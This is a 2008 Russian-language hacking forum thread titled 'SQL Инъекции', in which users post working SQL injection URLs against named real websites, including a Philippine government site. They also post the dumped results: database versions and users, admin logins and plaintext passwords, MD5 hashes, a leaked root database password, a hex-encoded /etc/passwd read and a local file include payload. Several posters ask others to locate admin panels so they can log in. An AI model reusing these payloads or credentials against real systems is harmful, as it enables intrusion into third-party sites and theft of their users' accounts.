SQL Инъекции

cash$$$ · 1 Jun 2008

http://www.calbank.net/newsite/products&services/index.php?id=99999+union+select+1,2,VERSION(),4,5,6,7,8,9/*
Click to expand...

VERSION: 4.1.22-standard-log
USER: [email protected]
DATABASE: 334937_calcms

========================================

http://www.euro-flash.net/release.php?ID=99999+union+select+1,2,VERSION(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*
Click to expand...

VERSION: 5.0.45-COMMUNITY
USER: NIKITIN_NIKITIN@LOCALHOST
DATABASE: NIKITIN_EUROFLASH

========================================

http://www.naturallyyoumagazine.com/house.php?id=99999+union+select+1,2,VERSION(),4/*
Click to expand...

VERSION: 4.0.27-icd1-log
USER: naturally@localhost
DATABASE: ny_db

otmorozok428 · 1 Jun 2008

ProTour

http://protour.prositer.ru/tours/index.php?ttid=14+AND+1--
http://protour.prositer.ru/countries/?id=14+and+1--
http://protour.prositer.ru/tours/index.php?ttid=14+AND+1<ascii(substring((version()),3,1))--
Click to expand...

VERSION(): 4.1.11-Debian_4sarge7-log
DATABASE(): prositer_tour
USER(): [email protected]

BlackSun · 1 Jun 2008

Имена колонок подобрать несмог, мускул 4 ..

http://www.luthiersargentinos.com.ar/data.php?id=0&p=1&nota=-1/**/union/**/select/**/1,2,3,4,5,6,7,8,0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764,10,11,12,13,14/*

На100ящий · 2 Jun 2008

http://www.axe.dp.ua/view.php?fid=-1+union+select+1,convert(concat_ws(0x3a,user_login,user_pass,user_email,user_url,user_status,user_nicename)+using+latin1),3,4,5,6,7,8+from+wp_users+limit+0,1/*
version()=5.0.15
login = admin
pass = saddam
Кто сможет найти админку, дайте ссылку!!)))

S00pY · 2 Jun 2008

На100ящий said:

http://www.axe.dp.ua/view.php?fid=-1+union+select+1,convert(concat_ws(0x3a,user_login,user_pass,user_email,user_url,user_status,user_nicename)+using+latin1),3,4,5,6,7,8+from+wp_users+limit+0,1/*
version()=5.0.15
login = admin
pass = saddam
Кто сможет найти админку, дайте ссылку!!)))
Click to expand...

http://axe.dp.ua/adm/
С первого раза

banned · 2 Jun 2008

http://www.funnybusiness.ca/news.php?id=-3+UNION+SELECT+1,concat_ws(0x3a,client,password,name),3,4,5,6+from+login_client/*
http://www.cagayandeoro.gov.ph/index.php?page=news&id=-1+union+select+1,2,concat_ws(0x3a,account_username,account_password),4,5,6,7,8,9+from+tbl_account/*

sabe · 2 Jun 2008

На100ящий, S00pY
в админку не заходит с твоим пасом. может из другой базы?

Вот еще базы:

http://www.axe.dp.ua/view.php?fid=-1+union+select+1,convert(concat_ws(0x3a,user,pass,email)+using+latin1),3,4,5,6,7,8+from+test_190.users+where+privilege=1/*
Click to expand...

http://www.axe.dp.ua/view.php?fid=-1+union+select+1,convert(concat_ws(0x3a,us_group_id,us_login,us_password)+using+latin1),3,4,5,6,7,8+from+test_267.users/*
Click to expand...

.Striker · 2 Jun 2008

http://www.periodontology.gr
база

$host="localhost";
$user="root";
$pass="sqlr@m@";
$Name="1to1db";
Click to expand...

PS если не сюда запостил удалите плз

[aywo] · 2 Jun 2008

http://old.rusmet.ru/production.php?act=comp&comp_id=-1+union+select+concat_ws(0x3a,database(),user(),version())/*&data_type=1&page=2
Версия:4.1.22
Пользователь:rusmet@localhost
База:rusmet_comp

http://www.metall.dn.ua/answer.php?id=-1+union+select+concat_ws(0x3a,user(),version(),database()),2/*
Версия:4.1.22
Пользователь:metalpor_metalpo@localhos
База:metalpor_clients

XTZ · 2 Jun 2008

http://alesya.by/interview.php?act=intview&int=-24+union+select+1,2,3,4,5/*

USER(): [email protected]
DATABASE(): u93086_alesa
VERSION(): 5.0.45-log

~!DoK_tOR!~ · 2 Jun 2008

www.shoesandblues.com

http://www.shoesandblues.com/lovesound/entry.php?id=-99999+union+select+1,2,concat(login,0x3a,password),4,5,6,7,8+from+users/*
Click to expand...

badlaura:cheney
becc:brian
janee:johnny
zoe:taylor

http://www.shoesandblues.com/lovesound/entry.php?id=-99999+union+select+1,2,concat(author,0x3a,password,0x3a,id),4,5,6,7,8+from+blog/*
Click to expand...

админки не нашёл (

КВР · 2 Jun 2008

Как поеметь Диму Билана ?(www.bilandima.ru)
А вот и ответ:
способ номер раз : анальный =)
SQL #1
Требует рeгу.
http://www.bilandima.ru/friendsclub/userinfo.php?id=0'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,concat_ws(0x3a,version(),database(),user()),23,24,25,26,27,28/*
Способ номер два: анальный с прибамбасом =)
SQL#2
http://www.bilandima.ru/friendsclub/

Электронная почта
E-mail

Пароль
Password

подставляем " ' " и емеем

Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''')' at line 1

Cпособ #3
Емеем в рот =)

(Local include)

http://www.bilandima.ru/html/promofoto.php?p=../../fotoalbum/fotos/209_oslo/001s.jpg%00

И незабудь резину (Proxy)

Web-defence.ru

S00pY · 2 Jun 2008

_http://www.btl.ru/interview-details.php?id=-1+union+select+1,2,3,password+from+_manager/*
version():5.0.45-log
pass:a86aea5517a58dd5674aa8dd89337e03
Ps:Есть также табла "users"

http://www.btl.ru/interview-details.php?id=-1+union+select+1,2,3,concat_ws(0x3a,name,email,address,phone,rank)+from+users+limit+1,1/*
Click to expand...

http://www.btl.ru/admin/
Click to expand...

Pss:_http://www.btl.ru/interview-details.php?id=-1+union+select+1,2,login,password+from+passwords+limit+0,1/*

~!DoK_tOR!~ · 2 Jun 2008

www.semplice.it

http://www.semplice.it/cucina_scheda.php?id=-99999+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9/*
Click to expand...

5.0.45:[email protected]:cucina

http://www.semplice.it/cucina_scheda.php?id=-99999+union+select+1,TABLE_NAME,3,4,5,6,7,8,9+FROM+INFORMATION_SCHEMA.TABLES+limit+17,1/*
Click to expand...

Momiji · 2 Jun 2008

telematrixusa.com
Code:
http://www.telematrixusa.com/index.php?id=999+union+select+concat(0x626C61626C61,0x3,version(),user(),database())/*
5.0.45-community-nt-logtelmtrxusa@localhosttelematrix
Code:
http://www.telematrixusa.com/index.php?id=999+union+select+concat(0x626C61626C61,0x3,username,0x3,password)+from+admin/*
webadminwebdemo
http://www.telematrixusa.com/siteadmin

bakl · 3 Jun 2008

http://www.bsigroup.ru/outgoing/country.php?id=-1+union+select+1/*

database: bsigroup_out
version: 5.0.22
user: bsigroup_newwww@localhost

P.S. есть таблица _system_user Поля(_Name,_status,_login_xz,_pass_xz)
Code:
http://www.bsigroup.ru/outgoing/country.php?id=-1+union+select+_login_xz+from+_system_user/*
P.P.S. Сам не до крутил её , кто найдёт что интересно киньтесь плз на мыло)) так не сайт нужен просто интересно чё от туда можно вытащить было.

~!DoK_tOR!~ · 3 Jun 2008

bakl said:
http://www.bsigroup.ru/outgoing/country.php?id=-1+union+select+1/*

database: bsigroup_out
version: 5.0.22
user: bsigroup_newwww@localhost

P.S. есть таблица _system_user Поля(_Name,_status,_login_xz,_pass_xz)
Code:
http://www.bsigroup.ru/outgoing/country.php?id=-1+union+select+_login_xz+from+_system_user/*
P.P.S. Сам не до крутил её , кто найдёт что интересно киньтесь плз на мыло)) так не сайт нужен просто интересно чё от туда можно вытащить было.
Click to expand...
http://www.bsigroup.ru/outgoing/country.php?id=-1+union+select+concat_ws(0x3a,_name,_login_xz,_pass_xz)+from+_system_user+where+_system_user_id=1/*
Click to expand...

Super User:root:89905f508ebdc32e7eb0c24fdb118305

логин был зашифрован в md5 )

$p01nt · 3 Jun 2008

www.bisart.ru --- в антибояне нет

http://www.bisart.ru/auto/index.php?sid=54+union+select+1,version(),3,4,5,6,7/*

4.0.27-log
db11539m
[email protected]

ЗЫ. первый найденный мной скуль иньект правда с 4ой базой я еще не работал ...

IIAHbI4 · 3 Jun 2008

http://bgmaker.ventdaval.com/get.php?id=-9999999 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71)%23

Database Version: 5.0.18-standard-log
Database name: db_bgmaker
User name: [email protected]
Click to expand...

Dimi4 · 3 Jun 2008

IIAHbI4 said:

http://bgmaker.ventdaval.com/get.php?id=-9999999 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71)%23
Click to expand...

фигасе закрутил.

http://www.rakurs.rovno.ua/info.php?id=-4740+union+select+от, одного,до,шести,database(),кагбевосемь,9,version(),user(),12,13,14/*

database() - rakursr_db
version() - 5.0.45
user() - rakursr_user@localhost

SQL Инъекции

cash$$$ Banned

otmorozok428 Banned

BlackSun Banned

На100ящий Elder - Старейшина

S00pY Active Member

banned Banned

sabe Elder - Старейшина

.Striker Elder - Старейшина

[aywo] Elder - Старейшина

XTZ New Member

~!DoK_tOR!~ Banned

КВР Elder - Старейшина

S00pY Active Member

~!DoK_tOR!~ Banned

Momiji Elder - Старейшина

bakl New Member

~!DoK_tOR!~ Banned

$p01nt Elder - Старейшина

IIAHbI4 Banned

Dimi4 Чайный пакетик

Useful Searches

SQL Инъекции

cash$$$ Banned

otmorozok428 Banned

BlackSun Banned

На100ящий Elder - Старейшина

S00pY Active Member

banned Banned

sabe Elder - Старейшина

.Striker Elder - Старейшина

[aywo] Elder - Старейшина

XTZ New Member

~!DoK_tOR!~ Banned

КВР Elder - Старейшина

S00pY Active Member

~!DoK_tOR!~ Banned

Momiji Elder - Старейшина

bakl New Member

~!DoK_tOR!~ Banned

$p01nt Elder - Старейшина

IIAHbI4 Banned

Dimi4 Чайный пакетик